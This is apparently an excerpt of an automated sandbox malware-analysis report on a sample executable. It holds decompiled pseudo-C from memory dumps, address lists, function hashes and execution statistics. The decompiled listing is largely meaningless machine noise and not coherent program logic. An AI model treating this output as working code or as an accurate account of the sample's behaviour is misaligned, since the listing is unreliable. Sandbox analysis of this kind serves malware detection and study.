																												if(_t160 != 0) {
																													goto L91;
																												} else {
																													 *_t160 =  *_t160 + _t160;
																													_t205 = _t160 + 0x6f;
																													_t260 = _t260 + 1;
																													 *_t205 =  *_t205 + _t205;
																													_t206 = _t205 |  *_t205;
																													_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x6b));
																													 *_t206 =  *_t206 + _t206;
																													__eflags =  *_t206;
																													 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t206;
																													asm("outsd");
																													_t160 = _t206 ^  *_t256;
																													 *_t260 =  *_t260 + _t256;
																													 *_t260 =  *_t260 + _t160;
																													__eflags =  *_t260;
																													if( *_t260 != 0) {
																														goto L89;
																													} else {
																														 *_t160 =  *_t160 + _t160;
																														_t207 = _t160 + 0x1a;
																														_pop(ds);
																														 *(_t231 + 0x31) =  *(_t231 + 0x31) & _t262;
																														 *_t207 =  *_t207 + _t207;
																														_t256 = _t256 |  *(_t261 + 0x33);
																														 *_t207 =  *_t207 + _t207;
																														_t208 = _t207 |  *_t207;
																														 *_t208 =  *_t208 + _t208;
																														_t198 = _t208 + 0x72;
																														_t250 = _t231 +  *((intOrPtr*)(_t231 - 0x6b)) + 1;
																														__eflags = _t250;
																														asm("adc [eax], al");
																														if(_t250 < 0) {
																															_t174 = _t198 + 0x6f;
																															__eflags = _t174;
																															_push(0x730a0000);
																															if (_t174 != 0) goto L112;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t245 = _t250 +  *[es:ebx-0x4d];
																															 *_t174 =  *_t174 + _t174;
																															__eflags =  *_t174;
																															L113:
																															_t108 = _t261 + _t263 * 2;
																															 *_t108 =  *(_t261 + _t263 * 2) + _t174;
																															__eflags =  *_t108;
																															_push(0x730a0000);
																															if ( *_t108 != 0) goto L114;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t246 = _t245 +  *[es:ebx-0x4d];
																															 *_t174 =  *_t174 + _t174;
																															_t175 = _t174 + 0x6f;
																															__eflags = _t175;
																															_push(0x730a0000);
																															L115:
																															 *_t175 =  *_t175 + _t175;
																															_t260 = _t260 |  *(_t246 + 0x7a);
																															 *_t175 =  *_t175 + _t175;
																															__eflags =  *_t175;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t244 = _t246 +  *[es:ebx-0x4d];
																															 *_t175 =  *_t175 + _t175;
																															_t171 = _t175 + 0x6f;
																															__eflags = _t171;
																															_push(0x730a0000);
																															L117:
																															if (__eflags != 0) goto L118;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t245 = _t244 +  *[es:ebx-0x4d];
																															 *_t171 =  *_t171 + _t171;
																															_t174 =  *(_t171 + 0x6f) * 0x00000000 |  *_t260;
																															__eflags = _t174;
																															if(_t174 != 0) {
																																goto L113;
																															}
																															 *_t174 =  *_t174 + _t174;
																															__eflags =  *_t174;
																															while(1) {
																																L120:
																																_t176 = _t174 + 0x16;
																																_pop(ss);
																																asm("outsd");
																																asm("insb");
																																 *_t176 =  *_t176 + _t176;
																																_t177 = _t176 |  *_t176;
																																_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
																																 *_t177 =  *_t177 + _t177;
																																_t175 =  *(_t177 + 0x6f) * 0x00000000 |  *_t260;
																																__eflags = _t175;
																																if(_t175 != 0) {
																																	goto L115;
																																}
																																 *_t175 =  *_t175 + _t175;
																																_t180 = _t175 + 0x18;
																																__eflags = _t180;
																																while(1) {
																																	asm("sbb [esi], dl");
																																	asm("outsd");
																																	asm("insb");
																																	 *_t180 =  *_t180 + _t180;
																																	_t181 = _t180 |  *_t180;
																																	_t244 = _t246 +  *((intOrPtr*)(_t246 - 0x4d));
																																	 *_t181 =  *_t181 + _t181;
																																	_t171 =  *(_t181 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t171;
																																	if(__eflags != 0) {
																																		goto L117;
																																	}
																																	 *_t171 =  *_t171 + _t171;
																																	_t184 = _t171 + 0x19;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t184 =  *_t184 + _t184;
																																	_t185 = _t184 |  *_t184;
																																	_t245 = _t244 +  *((intOrPtr*)(_t244 - 0x4d));
																																	 *_t185 =  *_t185 + _t185;
																																	_t174 =  *(_t185 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t174;
																																	if(_t174 != 0) {
																																		goto L120;
																																	}
																																	 *_t174 =  *_t174 + _t174;
																																	_t188 = _t174 + 0x16;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t188 =  *_t188 + _t188;
																																	_t189 = _t188 |  *_t188;
																																	__eflags = _t189;
																																	_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
																																	 *_t189 =  *_t189 + _t189;
																																	_t180 =  *(_t189 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t180;
																																	if(_t180 != 0) {
																																		continue;
																																	}
																																	 *_t180 =  *_t180 + _t180;
																																	_t192 = _t180 + 0x17;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t192 =  *_t192 + _t192;
																																	_t193 = _t192 |  *_t192;
																																	 *_t193 =  *_t193 + _t193;
																																	_t194 = _t193 + 0x1b;
																																	__eflags = _t194;
																																	asm("outsd");
																																	return _t194;
																																	goto L127;
																																}
																																goto L117;
																															}
																															goto L115;
																														} else {
																															_t167 = _t198 ^  *_t198;
																															__eflags = _t167;
																															goto L105;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags = _t157 - 0xa0000;
																							_t240 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
																							 *_t157 =  *_t157 + _t157;
																							_t209 = _t157 + 0x17;
																							__eflags = _t209;
																							asm("outsd");
																							if (_t209 <= 0) goto L77;
																							 *_t260 =  *_t260 + _t256;
																							__eflags =  *_t260;
																							_t210 = _t209 |  *_t209;
																							_t238 = _t240 +  *((intOrPtr*)(_t240 - 0x5d));
																							__eflags = _t238;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t142 = _t146 ^  *_t146;
																 *_t260 =  *_t260 + _t256;
																 *_t260 =  *_t260 + _t142;
																__eflags =  *_t260;
																if ( *_t260 != 0) goto L41;
																L52:
																 *0x1f040000 = _t144;
															}
														}
													}
												}
											}
										} else {
											_t130 = _t136 ^  *_t136;
											 *_t260 =  *_t260 + _t256;
											 *_t260 =  *_t260 + _t130;
											__eflags =  *_t260;
											if(__eflags != 0) {
												goto L21;
											} else {
												 *_t130 =  *_t130 + _t130;
												_t136 = _t130 + 0x18;
												asm("sbb [esi], edx");
												asm("sbb [ebx+0x3a], esi");
												 *_t136 =  *_t136 + _t136;
												_t256 = _t256 |  *(_t261 + 0x3b);
												 *_t136 =  *_t136 + _t136;
												__eflags =  *_t136;
												L31:
												 *_t260 =  *_t260 + _t256;
												 *_t260 =  *_t260 + _t136;
												__eflags =  *_t260;
												if (__eflags != 0) goto L24;
												goto L32;
											}
										}
										goto L127;
										L32:
										_t141 =  *0x1f040000;
									}
								}
								goto L19;
							}
							goto L127;
						}
						goto L16;
					}
					_t236 = _t235 +  *((intOrPtr*)(_t235 - 0x4f));
				} else {
					 *__eax =  *__eax + __al;
					__ch = __ch |  *(__edi + 0x32);
					 *__eax =  *__eax + __al;
					__al = __al |  *__eax;
					__bh = __bh +  *((intOrPtr*)(__ebx - 0x4f));
					 *__eax =  *__eax + __al;
					__al = __al + 0x16;
					asm("outsd");
					_t17 = __eax;
					__eax = __ebx;
					__ebx = _t17;
					 *__eax =  *__eax + __al;
					__al = __al |  *__eax;
					__bh = __bh +  *((intOrPtr*)(_t17 - 0x4f));
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					L15:
					_t19 = _t260 + _t262 * 2;
					 *_t19 =  *(_t260 + _t262 * 2) + _t130;
					__eflags =  *_t19;
					L16:
					_t131 =  *_t261;
					 *_t261 = _t130;
					 *((intOrPtr*)(_t131 + 0x6f)) =  *((intOrPtr*)(_t131 + 0x6f)) + _t260;
					_t132 = _t131 ^  *_t131;
					 *_t260 =  *_t260 + _t256;
					 *_t260 =  *_t260 + _t132;
					__eflags =  *_t260;
					if( *_t260 != 0) {
						_t235 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
					} else {
						 *_t132 =  *_t132 + _t132;
						asm("outsd");
						_t120 = _t264;
						_t264 = _t132 + 0x17;
						 *_t120 =  &(_t120[ *_t120]);
						__eflags =  *_t120;
						goto L18;
					}
				}
				L127:
			}

0x0096ba77
0x0096ba77
0x0096ba77
0x0096ba77
0x0096ba77
0x0096ba79
0x0096ba7c
0x0096ba7e
0x0096ba80
0x0096ba81
0x0096bab5
0x0096bab5
0x0096bab7
0x0096bab7
0x0096bab8
0x0096bab8
0x0096bab8
0x0096bab8
0x0096babb
0x0096babf
0x0096bac0
0x0096bac0
0x0096bac1
0x0096bac3
0x0096bac8
0x0096bacc
0x0096bacd
0x0096bacd
0x0096bace
0x0096bad0
0x0096bad2
0x0096bad5
0x0096bad9
0x0096bada
0x0096badc
0x0096bade
0x0096bade
0x0096badf
0x0096bae1
0x0096bae4
0x0096bae6
0x0096bae9
0x0096baeb
0x0096baed
0x0096baed
0x00000000
0x0096baee
0x0096baf0
0x0096baf2
0x0096baf4
0x0096baf5
0x0096baf7
0x0096baf9
0x0096baf9
0x0096bafb
0x00000000
0x0096bafd
0x0096bafd
0x0096bb01
0x0096bb02
0x0096bb02
0x0096bb03
0x0096bb03
0x0096bb05
0x0096bb07
0x0096bb0a
0x0096bb0c
0x0096bb0e
0x0096bb0f
0x0096bb11
0x0096bb13
0x0096bb13
0x0096bb15
0x00000000
0x00000000
0x0096bb17
0x0096bb19
0x0096bb1b
0x0096bb1e
0x0096bb20
0x0096bb22
0x0096bb22
0x0096bb25
0x0096bb25
0x0096bb27
0x0096bb29
0x0096bb2a
0x0096bb2c
0x0096bb2c
0x0096bb2e
0x00000000
0x00000000
0x0096bb30
0x0096bb30
0x0096bb32
0x0096bb35
0x0096bb37
0x0096bb39
0x0096bb3c
0x0096bb3e
0x0096bb40
0x0096bb42
0x0096bb42
0x0096bb42
0x0096bb43
0x0096bbb4
0x0096bbb6
0x0096bbb6
0x0096bbb8
0x00000000
0x0096bbba
0x0096bbba
0x0096bbbe
0x0096bbbf
0x0096bbc0
0x0096bbc0
0x0096bbc1
0x0096bbc1
0x0096bbc3
0x0096bbc3
0x0096bbc5
0x0096bb69
0x00000000
0x0096bb6b
0x0096bb6b
0x0096bb6d
0x0096bb70
0x0096bb74
0x0096bb74
0x00000000
0x0096bb74
0x0096bbc7
0x0096bbc7
0x0096bbc9
0x0096bbcb
0x0096bbcc
0x0096bbce
0x0096bbd0
0x0096bbd0
0x0096bbd2
0x0096bb76
0x0096bb76
0x0096bb7b
0x0096bb7c
0x0096bb7e
0x0096bb80
0x0096bb80
0x0096bb82
0x0096bb25
0x0096bb27
0x0096bb29
0x0096bb2a
0x0096bb2c
0x0096bb2c
0x0096bb2e
0x00000000
0x00000000
0x0096bb84
0x0096bb84
0x0096bb86
0x0096bb86
0x0096bb88
0x0096bb89
0x0096bb8b
0x00000000
0x0096bb8d
0x0096bb8d
0x00000000
0x0096bb8d
0x0096bb8b
0x0096bbd4
0x0096bbd4
0x0096bbd6
0x0096bbd8
0x0096bbdb
0x0096bbdd
0x0096bbdd
0x0096bbdd
0x0096bbdf
0x0096bbe1
0x0096bbe3
0x0096bbe4
0x0096bbe6
0x0096bbe8
0x0096bbe8
0x0096bbea
0x0096bb8e
0x0096bb8e
0x0096bb90
0x0096bb92
0x0096bb95
0x0096bb97
0x0096bb97
0x0096bb99
0x0096bb9a
0x0096bb9c
0x0096bb9e
0x0096bb9e
0x0096bb9f
0x0096bb9f
0x0096bb9f
0x0096bbec
0x0096bbec
0x0096bbee
0x0096bbee
0x0096bbf0
0x0096bbf1
0x0096bbf3
0x0096bc64
0x0096bc64
0x0096bc66
0x0096bc67
0x0096bc69
0x0096bc6b
0x0096bc6b
0x0096bc6d
0x0096bc12
0x0096bc14
0x0096bc16
0x0096bc17
0x0096bc19
0x0096bc1b
0x0096bc1b
0x0096bc1d
0x00000000
0x0096bc1f
0x0096bc1f
0x0096bc1f
0x00000000
0x0096bc1f
0x0096bc6f
0x0096bc6f
0x0096bc71
0x0096bc73
0x0096bc76
0x0096bc78
0x0096bc7a
0x0096bc7a
0x0096bc7b
0x0096bc7b
0x0096bc20
0x0096bc20
0x0096bc23
0x0096bc23
0x0096bc24
0x0096bc25
0x0096bc25
0x0096bc25
0x0096bc7d
0x0096bc7d
0x0096bc7f
0x0096bc81
0x0096bc84
0x0096bc86
0x0096bc89
0x0096bc8b
0x0096bc8d
0x0096bc90
0x0096bc92
0x0096bc94
0x0096bc96
0x0096bc96
0x0096bc96
0x0096bc97
0x0096bd08
0x0096bd0a
0x0096bd0a
0x0096bd0c
0x00000000
0x0096bd0e
0x0096bd0e
0x0096bd12
0x0096bd13
0x0096bd14
0x0096bd16
0x0096bd18
0x0096bd18
0x00000000
0x0096bd18
0x0096bc99
0x0096bc99
0x0096bc9b
0x0096bc9d
0x0096bc9d
0x0096bc9f
0x0096bc44
0x0096bc44
0x0096bc46
0x0096bc47
0x00000000
0x0096bc49
0x0096bc49
0x0096bc4b
0x0096bc4e
0x0096bc50
0x0096bc52
0x0096bc55
0x0096bc57
0x0096bc57
0x00000000
0x0096bc57
0x0096bca1
0x0096bca1
0x0096bca3
0x0096bca5
0x0096bca7
0x0096bcaa
0x0096bcac
0x0096bcaf
0x0096bcb1
0x0096bcb1
0x0096bcb2
0x0096bcb2
0x0096bcb2
0x0096bcb4
0x0096bc59
0x0096bc59
0x0096bc5a
0x0096bc5b
0x0096bc5d
0x0096bc5f
0x0096bc62
0x0096bc62
0x00000000
0x0096bcb6
0x0096bcb6
0x0096bcb8
0x0096bcba
0x0096bcbb
0x0096bcbc
0x0096bcc0
0x0096bcc0
0x0096bcc2
0x0096bcc3
0x0096bcc8
0x0096bccb
0x0096bccb
0x0096bccc
0x0096bccc
0x0096bccf
0x0096bcd0
0x0096bcd2
0x0096bcd4
0x0096bcd4
0x0096bcd6
0x00000000
0x0096bcd8
0x0096bcd8
0x0096bcda
0x0096bcda
0x0096bcdc
0x0096bcdd
0x0096bcdf
0x0096bd50
0x0096bd50
0x0096bd53
0x0096bd56
0x0096bd5b
0x0096bd5d
0x0096bd62
0x0096bd64
0x0096bd66
0x0096bd67
0x0096bd68
0x0096bd6d
0x0096bd70
0x0096bd72
0x0096bd72
0x0096bd73
0x0096bd73
0x0096bd73
0x0096bd75
0x0096bd1b
0x0096bd1b
0x0096bd1d
0x0096bd1f
0x0096bd20
0x0096bd22
0x0096bd24
0x0096bd24
0x0096bd26
0x00000000
0x00000000
0x00000000
0x00000000
0x0096bd77
0x0096bd77
0x0096bd77
0x0096bd78
0x0096bd78
0x0096bd78
0x0096bd78
0x0096bd79
0x0096bd7b
0x0096bd7c
0x0096bd7e
0x0096bd80
0x0096bd80
0x0096bd82
0x0096bd28
0x0096bd28
0x0096bd2a
0x0096bd2c
0x0096bd2d
0x0096bd30
0x0096bd32
0x0096bd35
0x0096bd37
0x0096bd39
0x0096bd3c
0x0096bd45
0x0096bd45
0x00000000
0x0096bd84
0x0096bd84
0x0096bd86
0x0096bd86
0x0096bd88
0x0096bd89
0x0096bd8b
0x0096bdfc
0x0096bdfc
0x0096bdfe
0x0096be00
0x0096be00
0x0096bd8d
0x0096bd8d
0x0096bd92
0x0096bd95
0x0096bd97
0x0096bd97
0x0096bd98
0x0096bd99
0x0096bd9a
0x0096bd9c
0x0096bd9e
0x0096bd9e
0x0096bda0
0x0096bd46
0x0096bd46
0x0096bd48
0x0096bd4a
0x0096bd4a
0x0096bda2
0x0096bda2
0x0096bda6
0x0096bda8
0x0096bda8
0x0096bdad
0x0096bdaf
0x0096bdaf
0x0096bdb1
0x0096bdb2
0x0096bdb4
0x0096bdb6
0x0096bdb6
0x0096bdb8
0x0096bd4f
0x0096bd4f
0x00000000
0x0096bdba
0x0096bdba
0x0096bdbc
0x0096bdbe
0x0096bdbf
0x0096bdc1
0x0096bdc1
0x0096bdc3
0x00000000
0x0096bdc5
0x0096bdc5
0x0096bdc7
0x0096bdc9
0x0096bdca
0x0096bdcc
0x0096bdce
0x0096bdd1
0x0096bdd1
0x0096bdd2
0x0096bdd5
0x0096bdd6
0x0096bdd8
0x0096bdda
0x0096bdda
0x0096bddc
0x00000000
0x0096bdde
0x0096bdde
0x0096bde0
0x0096bde2
0x0096bde3
0x0096bde6
0x0096bde8
0x0096bdeb
0x0096bded
0x0096bdf2
0x0096bdf4
0x0096bdf6
0x0096bdf6
0x0096bdf7
0x0096bdf9
0x0096be6a
0x0096be6a
0x0096be6c
0x0096be71
0x0096be73
0x0096be75
0x0096be76
0x0096be78
0x0096be7a
0x0096be7e
0x0096be7e
0x0096be7f
0x0096be7f
0x0096be7f
0x0096be7f
0x0096be82
0x0096be87
0x0096be89
0x0096be8b
0x0096be8c
0x0096be8e
0x0096be90
0x0096be94
0x0096be96
0x0096be96
0x0096be98
0x0096be99
0x0096be99
0x0096be9b
0x0096be9e
0x0096be9e
0x0096be9f
0x0096bea1
0x0096bea2
0x0096bea4
0x0096bea6
0x0096beaa
0x0096beac
0x0096beac
0x0096beae
0x0096beb3
0x0096beb3
0x0096beb5
0x0096beb7
0x0096beb8
0x0096beba
0x0096bebc
0x0096bec0
0x0096bec7
0x0096bec7
0x0096bec9
0x00000000
0x00000000
0x0096becb
0x0096becb
0x0096becd
0x0096becd
0x0096becd
0x0096becf
0x0096bed0
0x0096bed1
0x0096bed2
0x0096bed4
0x0096bed6
0x0096bed9
0x0096bee0
0x0096bee0
0x0096bee2
0x00000000
0x00000000
0x0096bee4
0x0096bee6
0x0096bee6
0x0096bee7
0x0096bee7
0x0096bee9
0x0096beea
0x0096beeb
0x0096beed
0x0096beef
0x0096bef2
0x0096bef9
0x0096bef9
0x0096befb
0x00000000
0x00000000
0x0096befd
0x0096beff
0x0096bf01
0x0096bf02
0x0096bf03
0x0096bf04
0x0096bf06
0x0096bf08
0x0096bf0b
0x0096bf12
0x0096bf12
0x0096bf14
0x00000000
0x00000000
0x0096bf16
0x0096bf18
0x0096bf1a
0x0096bf1b
0x0096bf1c
0x0096bf1d
0x0096bf1f
0x0096bf1f
0x0096bf21
0x0096bf24
0x0096bf2b
0x0096bf2b
0x0096bf2d
0x00000000
0x00000000
0x0096bf2f
0x0096bf31
0x0096bf33
0x0096bf34
0x0096bf35
0x0096bf36
0x0096bf38
0x0096bf3d
0x0096bf3f
0x0096bf3f
0x0096bf41
0x0096bf42
0x00000000
0x0096bf42
0x00000000
0x0096bee7
0x00000000
0x0096bdfb
0x0096bdfb
0x0096bdfb
0x00000000
0x0096bdfb
0x0096bdf9
0x0096bddc
0x0096bdc3
0x0096bdb8
0x0096bda0
0x0096bd8b
0x0096bd82
0x0096bce1
0x0096bce1
0x0096bce6
0x0096bce9
0x0096bceb
0x0096bceb
0x0096bced
0x0096bcee
0x0096bcf0
0x0096bcf0
0x0096bcf1
0x0096bcf3
0x0096bcf3
0x0096bcf3
0x0096bcdf
0x0096bcd6
0x0096bcb4
0x0096bc9f
0x0096bc97
0x0096bc7b
0x0096bbf5
0x0096bbf5
0x0096bbf7
0x0096bbf9
0x0096bbf9
0x0096bbfb
0x0096bbfc
0x0096bbfc
0x0096bbfc
0x0096bbf3
0x0096bbea
0x0096bbd2
0x0096bbc5
0x0096bb45
0x0096bb45
0x0096bb47
0x0096bb49
0x0096bb49
0x0096bb4b
0x00000000
0x0096bb4d
0x0096bb4d
0x0096bb4f
0x0096bb51
0x0096bb53
0x0096bb56
0x0096bb58
0x0096bb5b
0x0096bb5b
0x0096bb5c
0x0096bb5c
0x0096bb5e
0x0096bb5e
0x0096bb60
0x00000000
0x0096bb60
0x0096bb4b
0x00000000
0x0096bb61
0x0096bb61
0x0096bb61
0x0096bb25
0x00000000
0x0096bb03
0x00000000
0x0096bafb
0x00000000
0x0096baee
0x0096ba6c
0x0096ba84
0x0096ba84
0x0096ba86
0x0096ba89
0x0096ba8b
0x0096ba8d
0x0096ba90
0x0096ba92
0x0096ba94
0x0096ba95
0x0096ba95
0x0096ba95
0x0096ba96
0x0096ba98
0x0096ba9a
0x0096ba9d
0x0096ba9d
0x0096ba9e
0x0096ba9e
0x0096ba9e
0x0096ba9e
0x0096baa1
0x0096baa1
0x0096baa1
0x0096baa3
0x0096baa6
0x0096baa8
0x0096baaa
0x0096baaa
0x0096baac
0x0096ba5f
0x0096baae
0x0096baae
0x0096bab2
0x0096bab3
0x0096bab3
0x0096bab4
0x0096bab4
0x00000000
0x0096bab4
0x0096baac
0x00000000

Memory Dump Source

Source File: 00000000.00000002.294702301.0000000000962000.00000002.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.294677900.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
Instruction ID: 5ee2e889a7eefd783aac5025233fad3326435b75bc071e47fc36dfca8a228b17
Opcode Fuzzy Hash: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
Instruction Fuzzy Hash: 6142BF5590E7C29FDB074B785DB5294BFB0AD6321475E18C3C0C0CF0ABE20969AEE766

Uniqueness

Uniqueness Score: -1.00%

Function 0134EDF0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3fafd82a389435a042589de16580a8b142b5641f7b12b546025339290139ab
Instruction ID: 4b48d8f47068604e07517dad290fde57b59bcc9cbe128912929cda34dec52c93
Opcode Fuzzy Hash: 2c3fafd82a389435a042589de16580a8b142b5641f7b12b546025339290139ab
Instruction Fuzzy Hash: 2112D3F19117468BE332DF65E9D81897BA9B785328F904208D3617BAD8F7B8114ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0134DA1C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf3809660d85e07a7052d0c1d5ffe43642184d5b655c63e532328907feebfac
Instruction ID: f87597f769f8517e221b1d7f770d1cb620c055882a66621dcc2060aef09d0582
Opcode Fuzzy Hash: 8bf3809660d85e07a7052d0c1d5ffe43642184d5b655c63e532328907feebfac
Instruction Fuzzy Hash: 28A18C32E0021ACFDF15DFA9C84499EBBF2FF94304B15816AE905BB265EB74E905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01344148 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a7ec9c75f777324ed979e1830a3b70c00ce3d189b43b2ca13779496de1afe2d
Instruction ID: 2715cf0c56092242a3904bd4f90981cb72402abf022ba5040d92a4515f75fa6f
Opcode Fuzzy Hash: 8a7ec9c75f777324ed979e1830a3b70c00ce3d189b43b2ca13779496de1afe2d
Instruction Fuzzy Hash: E4A1AC70E012188FDB14CFA9C584BEDBBF2BF89309F208469D409AB755DB359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0134EDE0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c1f285fb5373e83e433773c32a7ca00687e30e2f4cac9c0277f875efd89794
Instruction ID: 4e744212b9a9c0c3884caf97b2ad709e63f1cde69f40f758c02847db87b6833c
Opcode Fuzzy Hash: e5c1f285fb5373e83e433773c32a7ca00687e30e2f4cac9c0277f875efd89794
Instruction Fuzzy Hash: 32C129B19117468BE732DF65E8C81897BB9BB85328F504318D3617B6D8F7B8114ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 07840F61 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ce343cbe88a855d1d7e359ffda75f6b54fcfccafd89fba5bbfff5ed398fcd0
Instruction ID: e8cb8263aedadb88595b73f2e4f496877a0293d8ea20e128832112b6f12fbfb4
Opcode Fuzzy Hash: 13ce343cbe88a855d1d7e359ffda75f6b54fcfccafd89fba5bbfff5ed398fcd0
Instruction Fuzzy Hash: FB6193B1E162098FD744EF7AE842A99BBF2EFC9304F04C839D0049B364EF7595459B81

Uniqueness

Uniqueness Score: -1.00%

Function 07840F70 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d6a854db5eb819528651743b5f1bc28f3fa24802b9e708351d572e5dd87c54
Instruction ID: 41e88bf43b640ca9520fb52bda878b9d5dd33a1de14d7c635585a1f5c2c27ec4
Opcode Fuzzy Hash: 48d6a854db5eb819528651743b5f1bc28f3fa24802b9e708351d572e5dd87c54
Instruction Fuzzy Hash: E16161B1E162098FD744EF7AE882A99BBF2AFC9304F00C839D0049B364EF7595459B85

Uniqueness

Uniqueness Score: -1.00%

Function 07842580 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6212823a3e788aa8d48471c64561d6572d35f7088654d0f2c88b6313f691b959
Instruction ID: a8e0b655e35cadcf1536c95f73739761590b356afa5cc2dd30a17205c4466da6
Opcode Fuzzy Hash: 6212823a3e788aa8d48471c64561d6572d35f7088654d0f2c88b6313f691b959
Instruction Fuzzy Hash: 9C413DB1E056588BEB5CCF6BCD4078AFAF3AFC9200F18C1BA950CAB255DB7109858F55

Uniqueness

Uniqueness Score: -1.00%

Function 0784256F Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b77efe89fe05c40fa3292ac5c9e44f11a1b7ce253b6ae825e785ec45e42ce8
Instruction ID: eb73f5ea8cdb415b6832c4dc41b8f0209ee5f8feef749fc1ccac681b7d6487af
Opcode Fuzzy Hash: 98b77efe89fe05c40fa3292ac5c9e44f11a1b7ce253b6ae825e785ec45e42ce8
Instruction Fuzzy Hash: 2D4131B1E056598BEB5CCF6B8D4078AFAF3AFC9200F18C1BA855CAB218DB7105958F10

Uniqueness

Uniqueness Score: -1.00%

Function 01344139 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11a5a1f1a28871ba0b7f88b2d7b3ec203411d97dae700d2e53ac210564d3008
Instruction ID: 10cc3457893bfc66bea545f6d8844ec6692353c35506b3083de3b0afa0e1afc5
Opcode Fuzzy Hash: f11a5a1f1a28871ba0b7f88b2d7b3ec203411d97dae700d2e53ac210564d3008
Instruction Fuzzy Hash: FF2195B2E056588BEB08CFAAD9543DEFBF2AF88304F14C57AC518AB254D7750649CF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: iuvRyl9i7D.exePID: 6932, Parent PID: 4928COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	708
Total number of Limit Nodes:	81

Executed Functions

Function 0040A140 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

